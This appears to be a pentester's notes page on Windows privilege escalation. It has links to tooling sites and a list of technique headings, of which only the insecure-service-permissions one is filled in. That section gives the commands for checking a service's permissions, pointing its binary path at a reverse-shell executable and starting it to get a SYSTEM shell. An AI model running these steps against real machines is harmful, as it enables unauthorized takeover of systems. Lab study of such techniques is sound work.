🪟Windows

Scripts & Sites

https://github.com/carlospolop/PEASS-ngarrow-up-right https://book.hacktricks.xyz/windowslocalescalationarrow-up-right https://wadcoms.github.io/arrow-up-right https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/windowsarrow-up-right

LOLBAS

https://lolbas-project.github.io/#arrow-up-right

Insecure Service Permissions:

# Access check can be downloaded at https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk
#Use accesschk.exe to check the "user" account's permissions on the "daclsvc" service

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

Note that the "user" account has the permission to change the service config (SERVICE_CHANGE_CONFIG).

Query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME):

sc qc daclsvc

Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:

sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

net start daclsvc

Unquoted Service Path

Weak Registry Permissions

Insecure Service Executables

Registry Auto Runs

Registry - AlwaysInstallElevated

Passwords Stored in Registry

List Saved Credentials

Scheduled Tasks

Insecure GUI Apps

Startup Apps

Token Impersonation - Rogue Potato

SeImpersonatePrivilege Enabled

Admin to NT Authority\System

Credits

Last updated